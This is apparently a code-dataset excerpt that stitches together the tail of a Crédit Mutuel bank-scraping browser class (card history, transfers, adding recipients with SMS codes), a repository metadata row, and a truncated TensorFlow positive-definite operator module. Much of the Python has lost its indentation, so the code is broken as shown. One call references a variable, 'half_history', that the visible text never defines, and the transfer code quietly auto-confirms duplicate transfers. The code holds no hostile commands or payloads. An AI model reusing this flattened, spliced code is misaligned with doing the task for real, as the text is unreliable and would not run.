for i in range(1, 100):
                            # Arbitrary range; it's the number of clicks needed to access the full history of the month (stop with the next break)
data = {
'_FID_DoAddElem': '',
'_wxf2_cc': 'fr-FR',
'_wxf2_pmode': 'Normal',
'_wxf2_pseq': i,
'_wxf2_ptarget': 'C:P:updPan',
'Data_ServiceListDatas_CurrentOtherCardThirdPartyNumber': '',
'Data_ServiceListDatas_CurrentType': 'MyCards',
}
if 'fid=GoMonth&mois=' in self.url:
m = re.search(r'fid=GoMonth&mois=(\d+)', self.url)
if m:
m = m.group(1)
self.location('CRP8_SCIM_DEPCAR.aspx?_tabi=C&a__itaret=as=SCIM_ListeActivityStep\%3a\%3a\%2fSCIM_ListeRouter%3a%3a&a__mncret=SCIM_LST&a__ecpid=EID2011&_stack=_remote::moiSelectionner={},moiAfficher={},typeDepense=T&_pid=SCIM_DEPCAR_Details'.format(m, half_history), data=data)
else:
self.location(self.url, data=data)
if not self.page.has_more_operations_xml():
history = self.page.iter_history_xml(date=self.tr_date)
                                # We now have an XML page with all the transactions of the month
break
else:
history = self.page.get_history(date=self.tr_date)
for tr in history:
                    # For regrouped transactions, we have to go through each one to get details
if tr._regroup:
self.location(tr._regroup)
for tr2 in self.page.get_tr_merged():
tr2._is_coming = tr._is_coming
tr2.date = self.tr_date
transactions.append(tr2)
else:
transactions.append(tr)
if transactions and self.tr_date < datetime.today().date():
tr = FrenchTransaction()
tr.raw = tr.label = "RELEVE CARTE %s" % self.tr_date
tr.amount = amount_summary
tr.date = tr.rdate = tr.vdate = self.tr_date
tr.type = FrenchTransaction.TYPE_CARD_SUMMARY
tr._is_coming = False
tr._is_manualsum = True
transactions.append(tr)
for tr in sorted_transactions(transactions):
yield tr
else:
# need to refresh the months select
if account._link_id.startswith('ENC_liste_oper'):
self.location(account._pre_link)
if not hasattr(account, '_card_pages'):
for tr in self.list_operations(account._link_id, account):
transactions.append(tr)
coming_link = self.page.get_coming_link() if self.operations.is_here() else None
if coming_link is not None:
for tr in self.list_operations(coming_link, account):
transactions.append(tr)
deferred_date = None
cards = ([page.select_card(account._card_number) for page in account._card_pages]
if hasattr(account, '_card_pages')
else account._card_links if hasattr(account, '_card_links') else [])
for card in cards:
card_trs = []
for tr in self.list_operations(card, account):
if tr._to_delete:
# Delete main transaction when subtransactions exist
continue
if hasattr(tr, '_deferred_date') and (not deferred_date or tr._deferred_date < deferred_date):
deferred_date = tr._deferred_date
if tr.date >= datetime.now():
tr._is_coming = True
elif hasattr(account, '_card_pages'):
card_trs.append(tr)
transactions.append(tr)
if card_trs:
transactions.extend(self.get_monthly_transactions(card_trs))
if deferred_date is not None:
# set deleted for card_summary
for tr in transactions:
tr.deleted = (tr.type == FrenchTransaction.TYPE_CARD_SUMMARY
and deferred_date.month <= tr.date.month
and not hasattr(tr, '_is_manualsum'))
for tr in sorted_transactions(transactions):
yield tr
@need_login
def get_investment(self, account):
if account._is_inv:
if account.type in (Account.TYPE_MARKET, Account.TYPE_PEA):
self.por.go(subbank=self.currentSubBank)
self.page.send_form(account)
elif account.type == Account.TYPE_LIFE_INSURANCE:
if not account._link_inv:
return iter([])
self.location(account._link_inv)
return self.page.iter_investment()
if account.type is Account.TYPE_PEA:
liquidities = create_french_liquidity(account.balance)
liquidities.label = account.label
return [liquidities]
return iter([])
@need_login
def iter_recipients(self, origin_account):
# access the transfer page
self.internal_transfer.go(subbank=self.currentSubBank)
if self.page.can_transfer(origin_account.id):
for recipient in self.page.iter_recipients(origin_account=origin_account):
yield recipient
self.external_transfer.go(subbank=self.currentSubBank)
if self.page.can_transfer(origin_account.id):
origin_account._external_recipients = set()
if self.page.has_transfer_categories():
for category in self.page.iter_categories():
self.page.go_on_category(category['index'])
self.page.IS_PRO_PAGE = True
for recipient in self.page.iter_recipients(origin_account=origin_account, category=category['name']):
yield recipient
else:
for recipient in self.page.iter_recipients(origin_account=origin_account):
yield recipient
@need_login
def init_transfer(self, account, to, amount, exec_date, reason=None):
if to.category != 'Interne':
self.external_transfer.go(subbank=self.currentSubBank)
else:
self.internal_transfer.go(subbank=self.currentSubBank)
if self.external_transfer.is_here() and self.page.has_transfer_categories():
for category in self.page.iter_categories():
if category['name'] == to.category:
self.page.go_on_category(category['index'])
break
self.page.IS_PRO_PAGE = True
self.page.RECIPIENT_STRING = 'data_input_indiceBen'
self.page.prepare_transfer(account, to, amount, reason, exec_date)
return self.page.handle_response(account, to, amount, reason, exec_date)
@need_login
def execute_transfer(self, transfer, **params):
form = self.page.get_form(id='P:F', submit='//input[@type="submit" and contains(@value, "Confirmer")]')
# For the moment, don't ask the user if he confirms the duplicate.
form['Bool:data_input_confirmationDoublon'] = 'true'
form.submit()
return self.page.create_transfer(transfer)
@need_login
def get_advisor(self):
advisor = None
if not self.is_new_website:
self.logger.info('On old creditmutuel website')
self.accounts.stay_or_go(subbank=self.currentSubBank)
if self.page.get_advisor_link():
advisor = self.page.get_advisor()
self.location(self.page.get_advisor_link()).page.update_advisor(advisor)
else:
advisor = self.new_accounts.stay_or_go(subbank=self.currentSubBank).get_advisor()
link = self.page.get_agency()
if link:
link = link.replace(':443/', '/')
self.location(link)
self.page.update_advisor(advisor)
return iter([advisor]) if advisor else iter([])
@need_login
def get_profile(self):
if not self.is_new_website:
self.logger.info('On old creditmutuel website')
profile = self.accounts.stay_or_go(subbank=self.currentSubBank).get_profile()
else:
profile = self.new_accounts.stay_or_go(subbank=self.currentSubBank).get_profile()
return profile
def get_recipient_object(self, recipient):
r = Recipient()
r.iban = recipient.iban
r.id = recipient.iban
r.label = recipient.label
r.category = recipient.category
        # On Credit Mutuel, recipients are immediately available.
r.enabled_at = datetime.now().replace(microsecond=0)
r.currency = 'EUR'
r.bank_name = NotAvailable
return r
def format_recipient_form(self, key):
self.recipient_form['[t:xsd%3astring;]Data_KeyInput'] = key
# we don't know the card id
# by default all users have only one card
# but to be sure, let's get it dynamically
do_validate = [k for k in self.recipient_form.keys() if '_FID_DoValidate_cardId' in k]
assert len(do_validate) == 1, 'There should be only one card.'
self.recipient_form[do_validate[0]] = ''
activate = [k for k in self.recipient_form.keys() if '_FID_GoCardAction_action' in k]
for _ in activate:
del self.recipient_form[_]
def continue_new_recipient(self, recipient, **params):
if 'Clé' in params:
url = self.recipient_form.pop('url')
self.format_recipient_form(params['Clé'])
self.location(url, data=self.recipient_form)
self.recipient_form = None
if self.verify_pass.is_here():
self.page.handle_error()
            assert False, 'An error occurred while checking the card code'
self.page.add_recipient(recipient)
if self.page.bic_needed():
self.page.ask_bic(self.get_recipient_object(recipient))
self.page.ask_sms(self.get_recipient_object(recipient))
def send_sms(self, sms):
data = {}
for k, v in self.form.items():
if k != 'url':
data[k] = v
data['otp_password'] = sms
data['_FID_DoConfirm.x'] = '1'
data['_FID_DoConfirm.y'] = '1'
data['global_backup_hidden_key'] = ''
self.location(self.form['url'], data=data)
def end_new_recipient(self, recipient, **params):
self.send_sms(params['code'])
self.form = None
self.page = None
self.logged = 0
return self.get_recipient_object(recipient)
def post_with_bic(self, recipient, **params):
data = {}
for k, v in self.form.items():
if k != 'url':
data[k] = v
data['[t:dbt%3astring;x(11)]data_input_BIC'] = params['Bic']
self.location(self.form['url'], data=data)
self.page.ask_sms(self.get_recipient_object(recipient))
def set_new_recipient(self, recipient, **params):
if self.currentSubBank is None:
self.getCurrentSubBank()
if 'Bic' in params:
return self.post_with_bic(recipient, **params)
if 'code' in params:
return self.end_new_recipient(recipient, **params)
if 'Clé' in params:
return self.continue_new_recipient(recipient, **params)
        assert False, 'An error occurred while adding a recipient.'
@need_login
def new_recipient(self, recipient, **params):
if self.currentSubBank is None:
self.getCurrentSubBank()
self.recipients_list.go(subbank=self.currentSubBank)
if self.page.has_list():
assert recipient.category in self.page.get_recipients_list(), \
                'Recipient category "%s" is not in the list available on the website.' % recipient.category
self.page.go_list(recipient.category)
self.page.go_to_add()
if self.verify_pass.is_here():
self.page.check_personal_keys_error()
self.recipient_form = self.page.get_recipient_form()
raise AddRecipientStep(self.get_recipient_object(recipient), Value('Clé', label=self.page.get_question()))
else:
return self.continue_new_recipient(recipient, **params)
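    # A hypothetical sketch (not part of the original module) of the multi-step
    # flow implemented by new_recipient()/set_new_recipient() above; the values
    # below are illustrative only:
    #
    #   browser.new_recipient(recipient)
    #   # -> raises AddRecipientStep asking for the personal key 'Clé'
    #   browser.set_new_recipient(recipient, **{'Clé': '1234'})
    #   # -> continue_new_recipient(): posts the key, may ask for a BIC,
    #   #    then requests an SMS code
    #   browser.set_new_recipient(recipient, code='567890')
    #   # -> end_new_recipient(): posts the SMS code and returns a Recipient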
@need_login
def iter_subscriptions(self):
if self.currentSubBank is None:
self.getCurrentSubBank()
self.subscription.go(subbank=self.currentSubBank)
return self.page.iter_subscriptions()
@need_login
def iter_documents(self, subscription):
if self.currentSubBank is None:
self.getCurrentSubBank()
self.subscription.go(subbank=self.currentSubBank, params={'typ': 'doc'})
security_limit = 10
for i in range(security_limit):
for doc in self.page.iter_documents(sub_id=subscription.id):
yield doc
if self.page.is_last_page():
break
self.page.next_page()
| lgpl-3.0 | -2,725,548,668,398,420,000 | 46.310722 | 308 | 0.584316 | false |
rew4332/tensorflow | tensorflow/contrib/distributions/python/ops/operator_pd.py | 1 | 29415 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base class for symmetric positive definite operator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import numpy as np
import six
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
@six.add_metaclass(abc.ABCMeta)
class OperatorPDBase(object):
"""Class representing a (batch) of positive definite matrices `A`.
This class provides access to functions of a (batch) symmetric positive
definite (PD) matrix, without the need to materialize them. In other words,
this provides means to do "matrix free" computations.
### Basics
For example, `my_operator.matmul(x)` computes the result of matrix
multiplication, and this class is free to do this computation with or without
ever materializing a matrix.
In practice, this operator represents a (batch) matrix `A` with shape
`[N1,...,Nn, k, k]` for some `n >= 0`. The first `n` indices index a
batch member. For every batch index `(i1,...,ib)`, `A[i1,...,in, : :]` is
a `k x k` matrix. Again, this matrix `A` may not be materialized, but for
purposes of broadcasting this shape will be relevant.
Since `A` is (batch) positive definite, it has a (or several) square roots `S`
such that `A = SS^T`.
For example, if `MyOperator` inherits from `OperatorPDBase`, the user can do
```python
operator = MyOperator(...) # Initialize with some tensors.
operator.log_det()
# Compute the quadratic form x^T A^{-1} x for vector x.
x = ... # some shape [M1,...,Mm, N1,...,Nn, k] tensor
operator.inv_quadratic_form_on_vectors(x)
# Matrix multiplication by the square root, S w.
# If w is iid normal, S w has covariance A.
w = ... # some shape [N1,...,Nn, k, r] tensor, r >= 1
operator.sqrt_matmul(w)
```
The above three methods, `log_det`, `inv_quadratic_form_on_vectors`, and
`sqrt_matmul` provide "all" that is necessary to use a covariance matrix
in a multi-variate normal distribution. See the class `MVNOperatorPD`.
### Details about shape requirements
The `Operator` classes operate on batch vectors and batch matrices with
compatible shapes. `matrix` is a batch matrix with compatible shape if
```
operator.shape = [N1,...,Nn] + [j, k]
matrix.shape = [N1,...,Nn] + [k, r]
```
This is the same requirement as `tf.matmul`. `vec` is a batch vector with
compatible shape if
```
operator.shape = [N1,...,Nn] + [j, k]
vec.shape = [N1,...,Nn] + [k]
OR
vec.shape = [M1,...,Mm] + [N1,...,Nn] + [k]
```
We are strict with the matrix shape requirements since we do not want to
require `Operator` broadcasting. The `Operator` may be defined by large
tensors (thus broadcasting is expensive), or the `Operator` may be matrix
free, in which case there is no guarantee that the underlying implementation
will broadcast.
We are more flexible with vector shapes since extra leading dimensions can
be "flipped" to the end to change the vector to a compatible matrix.
"""
@abc.abstractproperty
def name(self):
"""String name identifying this `Operator`."""
return self._name
@abc.abstractproperty
def verify_pd(self):
"""Whether to verify that this `Operator` is positive definite."""
# return self._verify_pd
pass
@abc.abstractproperty
def dtype(self):
"""Data type of matrix elements of `A`."""
pass
def add_to_tensor(self, mat, name='add_to_tensor'):
"""Add matrix represented by this operator to `mat`. Equiv to `A + mat`.
Args:
mat: `Tensor` with same `dtype` and shape broadcastable to `self`.
name: A name to give this `Op`.
Returns:
A `Tensor` with broadcast shape and same `dtype` as `self`.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs + [mat]):
mat = ops.convert_to_tensor(mat, name='mat')
return self._add_to_tensor(mat)
def _add_to_tensor(self, mat):
# Re-implement in derived class if a more efficient method is available.
return self.to_dense() + mat
def _dispatch_based_on_batch(self, batch_method, singleton_method, **args):
"""Helper to automatically call batch or singleton operation."""
if self.get_shape().ndims is not None:
is_batch = self.get_shape().ndims > 2
if is_batch:
return batch_method(**args)
else:
return singleton_method(**args)
else:
is_batch = self.rank() > 2
return control_flow_ops.cond(
is_batch,
lambda: batch_method(**args),
lambda: singleton_method(**args)
)
def inv_quadratic_form_on_vectors(
self, x, name='inv_quadratic_form_on_vectors'):
"""Compute the quadratic form: `x^T A^{-1} x` where `x` is a batch vector.
`x` is a batch vector with compatible shape if
```
self.shape = [N1,...,Nn] + [k, k]
x.shape = [M1,...,Mm] + [N1,...,Nn] + [k]
```
Args:
x: `Tensor` with compatible batch vector shape and same `dtype` as self.
name: A name scope to use for ops added by this method.
Returns:
`Tensor` with shape `[M1,...,Mm] + [N1,...,Nn]` and same `dtype`
as `self`.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=[x] + self.inputs):
x = ops.convert_to_tensor(x, name='x')
return self._inv_quadratic_form_on_vectors(x)
def _inv_quadratic_form_on_vectors(self, x):
# Implement in derived class to enable self.inv_quadratic_form_on_vectors().
#
# To implement,
# Depending on which is more efficient, derived class should be a one-liner
# calling either
# return self._iqfov_via_sqrt_solve(x)
# OR
# return self._iqfov_via_solve(x)
# both of which are written in this base class.
raise NotImplementedError(
'inv_quadratic_form_on_vectors not implemented')
def _iqfov_via_sqrt_solve(self, x):
"""Get the inverse quadratic form on vectors via a sqrt_solve."""
    # x^T A^{-1} x = || S^{-1} x ||^2,
# where S is a square root of A (A = SS^T).
# Steps:
# 1. Convert x to a matrix, flipping all extra dimensions in `x` to the
# final dimension of x_matrix.
x_matrix = _flip_vector_to_matrix(
x, self.batch_shape(), self.get_batch_shape())
# 2. Get soln_matrix = S^{-1} x_matrix
soln_matrix = self.sqrt_solve(x_matrix)
# 3. Reshape back to a vector.
soln = _flip_matrix_to_vector(
soln_matrix, _extract_batch_shape(x, 1), x.get_shape()[:-1])
# 4. L2 (batch) vector norm squared.
result = math_ops.reduce_sum(
math_ops.square(soln), reduction_indices=[-1])
result.set_shape(x.get_shape()[:-1])
return result
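  # A minimal NumPy sketch (not part of this module) checking the identity
  # used above, x^T A^{-1} x = || S^{-1} x ||^2 when A = S S^T; all names
  # below are illustrative only:
  #
  #   import numpy as np
  #   S = np.tril(np.random.rand(3, 3)) + np.eye(3)  # one square root of A
  #   A = S.dot(S.T)
  #   x = np.random.rand(3)
  #   lhs = x.dot(np.linalg.solve(A, x))
  #   rhs = np.sum(np.linalg.solve(S, x) ** 2)
  #   np.testing.assert_allclose(lhs, rhs)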
def _iqfov_via_solve(self, x):
"""Get the inverse quadratic form on vectors via a solve."""
    # x^T A^{-1} x
# 1. Convert x to a matrix, flipping all extra dimensions in `x` to the
# final dimension of x_matrix.
x_matrix = _flip_vector_to_matrix(
x, self.batch_shape(), self.get_batch_shape())
    # 2. Get soln_matrix = A^{-1} x_matrix
soln_matrix = self.solve(x_matrix)
# 3. Reshape back to a vector.
soln = _flip_matrix_to_vector(
soln_matrix, _extract_batch_shape(x, 1), x.get_shape()[:-1])
# 4. Compute the dot product: x^T soln
result = math_ops.reduce_sum(x * soln, reduction_indices=[-1])
result.set_shape(x.get_shape()[:-1])
return result
def det(self, name='det'):
"""Determinant for every batch member.
Args:
name: A name scope to use for ops added by this method.
Returns:
Determinant for every batch member.
"""
# Derived classes are encouraged to implement log_det() (since it is
# usually more stable), and then det() comes for free.
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return self._det()
def _det(self):
return math_ops.exp(self.log_det())
def log_det(self, name='log_det'):
"""Log of the determinant for every batch member.
Args:
name: A name scope to use for ops added by this method.
Returns:
Logarithm of determinant for every batch member.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return self._dispatch_based_on_batch(self._batch_log_det, self._log_det)
def _batch_log_det(self):
# Implement in derived class to enable self.log_det(x).
raise NotImplementedError('Log determinant (log_det) not implemented.')
def _log_det(self):
# As implemented here, this just calls the batch version. If a more
# efficient non-batch version is available, override in the derived class.
return self._batch_log_det()
def sqrt_log_det(self, name='sqrt_log_det'):
"""Log of the determinant of the sqrt `S` for every batch member.
Args:
name: A name scope to use for ops added by this method.
Returns:
Logarithm of determinant of the square root `S` for every batch member.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return self._dispatch_based_on_batch(
self._batch_sqrt_log_det, self._sqrt_log_det)
def _batch_sqrt_log_det(self):
# Over-ride in derived class if it can be done more efficiently.
return 0.5 * self._log_det()
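  # Why the 0.5 factor above: if A = S S^T then det(A) = det(S) * det(S^T)
  # = det(S)^2, so log|det(S)| = 0.5 * log det(A) for positive definite A.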
def _sqrt_log_det(self):
# As implemented here, this just calls the batch version. If a more
# efficient non-batch version is available, override in the derived class.
return self._batch_sqrt_log_det()
@abc.abstractproperty
def inputs(self):
"""List of tensors that were provided as initialization inputs."""
pass
@abc.abstractmethod
def get_shape(self):
"""Static `TensorShape` of entire operator.
If this operator represents the batch matrix `A` with
`A.shape = [N1,...,Nn, k, k]`, then this returns
`TensorShape([N1,...,Nn, k, k])`
Returns:
`TensorShape`, statically determined, may be undefined.
"""
pass
def get_batch_shape(self):
"""`TensorShape` with batch shape. Statically determined if possible.
If this operator represents the batch matrix `A` with
`A.shape = [N1,...,Nn, k, k]`, then this returns `TensorShape([N1,...,Nn])`
Returns:
`TensorShape`, statically determined, may be undefined.
"""
# Derived classes get this "for free" once .get_shape() is implemented.
return self.get_shape()[:-2]
def get_vector_shape(self):
"""`TensorShape` of vectors this operator will work with.
If this operator represents the batch matrix `A` with
`A.shape = [N1,...,Nn, k, k]`, then this returns
`TensorShape([N1,...,Nn, k])`
Returns:
`TensorShape`, statically determined, may be undefined.
"""
# Derived classes get this "for free" once .get_shape() is implemented.
return self.get_shape()[:-1]
def shape(self, name='shape'):
"""Equivalent to `tf.shape(A).` Equal to `[N1,...,Nn, k, k]`, `n >= 0`.
Args:
name: A name scope to use for ops added by this method.
Returns:
`int32` `Tensor`
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return self._shape()
@abc.abstractmethod
def _shape(self):
# Implement in derived class to enable .shape().
pass
def rank(self, name='rank'):
"""Tensor rank. Equivalent to `tf.rank(A)`. Will equal `n + 2`.
If this operator represents the batch matrix `A` with
`A.shape = [N1,...,Nn, k, k]`, the `rank` is `n + 2`.
Args:
name: A name scope to use for ops added by this method.
Returns:
`int32` `Tensor`
"""
# Derived classes get this "for free" once .shape() is implemented.
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return array_ops.size(self.shape())
def batch_shape(self, name='batch_shape'):
"""Shape of batches associated with this operator.
If this operator represents the batch matrix `A` with
`A.shape = [N1,...,Nn, k, k]`, the `batch_shape` is `[N1,...,Nn]`.
Args:
name: A name scope to use for ops added by this method.
Returns:
`int32` `Tensor`
"""
# Derived classes get this "for free" once .shape() is implemented.
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return array_ops.slice(self.shape(), [0], [self.rank() - 2])
def vector_shape(self, name='vector_shape'):
"""Shape of (batch) vectors that this (batch) matrix will multiply.
If this operator represents the batch matrix `A` with
`A.shape = [N1,...,Nn, k, k]`, the `vector_shape` is `[N1,...,Nn, k]`.
Args:
name: A name scope to use for ops added by this method.
Returns:
`int32` `Tensor`
"""
# Derived classes get this "for free" once .shape() is implemented.
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return array_ops.concat(
0, (self.batch_shape(), [self.vector_space_dimension()]))
def vector_space_dimension(self, name='vector_space_dimension'):
"""Dimension of vector space on which this acts. The `k` in `R^k`.
If this operator represents the batch matrix `A` with
`A.shape = [N1,...,Nn, k, k]`, the `vector_space_dimension` is `k`.
Args:
name: A name scope to use for ops added by this method.
Returns:
`int32` `Tensor`
"""
# Derived classes get this "for free" once .shape() is implemented.
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return array_ops.gather(self.shape(), self.rank() - 1)
def matmul(self, x, transpose_x=False, name='matmul'):
"""Left (batch) matmul `x` by this matrix: `Ax`.
`x` is a batch matrix with compatible shape if
```
self.shape = [N1,...,Nn] + [k, k]
x.shape = [N1,...,Nn] + [k, r]
```
Args:
x: `Tensor` with shape `self.batch_shape + [k, r]` and same `dtype` as
this `Operator`.
transpose_x: If `True`, `x` is transposed before multiplication.
name: A name to give this `Op`.
Returns:
A result equivalent to `tf.batch_matmul(self.to_dense(), x)`.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=[x] + self.inputs):
x = ops.convert_to_tensor(x, name='x')
return self._dispatch_based_on_batch(
self._batch_matmul, self._matmul, x=x, transpose_x=transpose_x)
def _batch_matmul(self, x, transpose_x=False):
# Implement in derived class to enable self.matmul(x).
raise NotImplementedError('This operator has no batch matmul Op.')
def _matmul(self, x, transpose_x=False):
# As implemented here, this just calls the batch version. If a more
# efficient non-batch version is available, override in the derived class.
return self._batch_matmul(x, transpose_x=transpose_x)
def sqrt_matmul(self, x, transpose_x=False, name='sqrt_matmul'):
"""Left (batch) matmul `x` by a sqrt of this matrix: `Sx` where `A = S S^T`.
`x` is a batch matrix with compatible shape if
```
self.shape = [N1,...,Nn] + [k, k]
x.shape = [N1,...,Nn] + [k, r]
```
Args:
x: `Tensor` with shape `self.batch_shape + [k, r]` and same `dtype` as
this `Operator`.
transpose_x: If `True`, `x` is transposed before multiplication.
name: A name scope to use for ops added by this method.
Returns:
A result equivalent to `tf.batch_matmul(self.sqrt_to_dense(), x)`.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=[x] + self.inputs):
x = ops.convert_to_tensor(x, name='x')
return self._dispatch_based_on_batch(
self._batch_sqrt_matmul, self._sqrt_matmul, x=x,
transpose_x=transpose_x)
def _batch_sqrt_matmul(self, x, transpose_x=False):
# Implement in derived class to enable self.sqrt_matmul(x).
raise NotImplementedError('This operator has no batch_sqrt_matmul Op.')
def _sqrt_matmul(self, x, transpose_x=False):
# As implemented here, this just calls the batch version. If a more
# efficient non-batch version is available, override in the derived class.
return self._batch_sqrt_matmul(x, transpose_x=transpose_x)
def solve(self, rhs, name='solve'):
"""Solve `r` batch systems: `A X = rhs`.
`rhs` is a batch matrix with compatible shape if
```python
self.shape = [N1,...,Nn] + [k, k]
rhs.shape = [N1,...,Nn] + [k, r]
```
For every batch member, this is done in `O(r*k^2)` complexity using back
substitution.
```python
# Solve one linear system (r = 1) for every member of the length 10 batch.
A = ... # shape 10 x 2 x 2
RHS = ... # shape 10 x 2 x 1
operator.shape # = 10 x 2 x 2
    X = operator.solve(RHS)  # shape 10 x 2 x 1
    # operator.matmul(X) ~ RHS
X[3, :, 0] # Solution to the linear system A[3, :, :] x = RHS[3, :, 0]
# Solve five linear systems (r = 5) for every member of the length 10 batch.
operator.shape # = 10 x 2 x 2
RHS = ... # shape 10 x 2 x 5
...
X[3, :, 2] # Solution to the linear system A[3, :, :] x = RHS[3, :, 2]
```
Args:
rhs: `Tensor` with same `dtype` as this operator and compatible shape,
`rhs.shape = self.shape[:-1] + [r]` for `r >= 1`.
name: A name scope to use for ops added by this method.
Returns:
`Tensor` with same `dtype` and shape as `x`.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=[rhs] + self.inputs):
rhs = ops.convert_to_tensor(rhs, name='rhs')
return self._dispatch_based_on_batch(
self._batch_solve, self._solve, rhs=rhs)
def _solve(self, rhs):
# As implemented here, this just calls the batch version. If a more
# efficient non-batch version is available, override in the derived class.
return self._batch_solve(rhs)
def _batch_solve(self, rhs):
# Implement in derived class to enable self.solve().
raise NotImplementedError('batch_solve not implemented for this Operator.')
def sqrt_solve(self, rhs, name='sqrt_solve'):
"""Solve `r` batch systems involving sqrt: `S X = rhs` where `A = SS^T`.
`rhs` is a batch matrix with compatible shape if
```python
self.shape = [N1,...,Nn] + [k, k]
rhs.shape = [N1,...,Nn] + [k, r]
```
For every batch member, this is done in `O(r*k^2)` complexity using back
substitution.
```python
# Solve one linear system (r = 1) for every member of the length 10 batch.
A = ... # shape 10 x 2 x 2
RHS = ... # shape 10 x 2 x 1
operator.shape # = 10 x 2 x 2
    X = operator.sqrt_solve(RHS)  # shape 10 x 2 x 1
    # operator.sqrt_matmul(X) ~ RHS
X[3, :, 0] # Solution to the linear system S[3, :, :] x = RHS[3, :, 0]
# Solve five linear systems (r = 5) for every member of the length 10 batch.
operator.shape # = 10 x 2 x 2
RHS = ... # shape 10 x 2 x 5
...
X[3, :, 2] # Solution to the linear system S[3, :, :] x = RHS[3, :, 2]
```
Args:
rhs: `Tensor` with same `dtype` as this operator and compatible shape,
`rhs.shape = self.shape[:-1] + [r]` for `r >= 1`.
name: A name scope to use for ops added by this method.
Returns:
`Tensor` with same `dtype` and shape as `x`.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=[rhs] + self.inputs):
rhs = ops.convert_to_tensor(rhs, name='rhs')
return self._dispatch_based_on_batch(
self._batch_sqrt_solve, self._sqrt_solve, rhs=rhs)
def _sqrt_solve(self, rhs):
# As implemented here, this just calls the batch version. If a more
# efficient non-batch version is available, override in the derived class.
return self._batch_sqrt_solve(rhs)
def _batch_sqrt_solve(self, rhs):
# Implement in derived class to enable self.sqrt_solve()
raise NotImplementedError(
'batch sqrt_solve not implemented for this Operator.')
def to_dense(self, name='to_dense'):
"""Return a dense (batch) matrix representing this operator."""
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return self._to_dense()
def _to_dense(self):
# Implement in derived class to enable self.to_dense().
raise NotImplementedError('This operator has no dense representation.')
def sqrt_to_dense(self, name='sqrt_to_dense'):
"""Return a dense (batch) matrix representing sqrt of this operator."""
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return self._sqrt_to_dense()
def _sqrt_to_dense(self):
# Implement in derived class to enable self.sqrt_to_dense().
raise NotImplementedError('This operator has no dense sqrt representation.')
def _flip_matrix_to_vector(mat, batch_shape, static_batch_shape):
"""Flip dims to reshape batch matrix `mat` to a vector with given batch shape.
```python
  mat = tf.random_normal([2, 3, 4, 6])
# Flip the trailing dimension around to the front.
  _flip_matrix_to_vector(mat, [6, 2, 3], [6, 2, 3])  # Shape [6, 2, 3, 4]
# Flip the trailing dimension around then reshape batch indices to batch_shape
_flip_matrix_to_vector(mat, [6, 3, 2], [6, 3, 2]) # Shape [6, 3, 2, 4]
_flip_matrix_to_vector(mat, [2, 3, 2, 3], [2,3,2,3]) # Shape [2, 3, 2, 3, 4]
```
Assume `mat.shape = matrix_batch_shape + [k, M]`. The returned vector is
generated in two steps:
1. Flip the final dimension to the front, giving a shape
`[M] + matrix_batch_shape + [k]`.
2. Reshape the leading dimensions, giving final shape = `batch_shape + [k]`.
The reshape in step 2 will fail if the number of elements is not equal, i.e.
`M*prod(matrix_batch_shape) != prod(batch_shape)`.
See also: _flip_vector_to_matrix.
Args:
mat: `Tensor` with rank `>= 2`.
batch_shape: `int32` `Tensor` giving leading "batch" shape of result.
static_batch_shape: `TensorShape` object giving batch shape of result.
Returns:
`Tensor` with same elements as `mat` but with shape `batch_shape + [k]`.
"""
mat = ops.convert_to_tensor(mat, name='mat')
if (static_batch_shape.is_fully_defined()
and mat.get_shape().is_fully_defined()):
return _flip_matrix_to_vector_static(mat, static_batch_shape)
else:
return _flip_matrix_to_vector_dynamic(mat, batch_shape)
def _flip_matrix_to_vector_static(mat, static_batch_shape):
"""Flip matrix to vector with static shapes."""
mat_rank = mat.get_shape().ndims
k = mat.get_shape()[-2]
final_shape = static_batch_shape.concatenate(k)
# mat.shape = matrix_batch_shape + [k, M]
# Permutation corresponding to [M] + matrix_batch_shape + [k]
perm = [mat_rank - 1] + list(range(0, mat_rank - 1))
mat_with_end_at_beginning = array_ops.transpose(mat, perm=perm)
vector = array_ops.reshape(mat_with_end_at_beginning, final_shape)
return vector
def _flip_matrix_to_vector_dynamic(mat, batch_shape):
"""Flip matrix to vector with dynamic shapes."""
mat_rank = array_ops.rank(mat)
k = array_ops.gather(array_ops.shape(mat), mat_rank - 2)
final_shape = array_ops.concat(0, (batch_shape, [k]))
# mat.shape = matrix_batch_shape + [k, M]
# Permutation corresponding to [M] + matrix_batch_shape + [k]
perm = array_ops.concat(
0, ([mat_rank - 1], math_ops.range(0, mat_rank - 1)))
mat_with_end_at_beginning = array_ops.transpose(mat, perm=perm)
vector = array_ops.reshape(mat_with_end_at_beginning, final_shape)
return vector
def _flip_vector_to_matrix(vec, batch_shape, static_batch_shape):
"""Flip dims to reshape batch vector `x` to a matrix with given batch shape.
```python
  vec = tf.random_normal([2, 3, 4, 5])
# Flip the leading dimension to the end.
_flip_vector_to_matrix(vec, [3, 4], [3, 4]) # Shape [3, 4, 5, 2]
# Flip nothing, just extend with a singleton dimension.
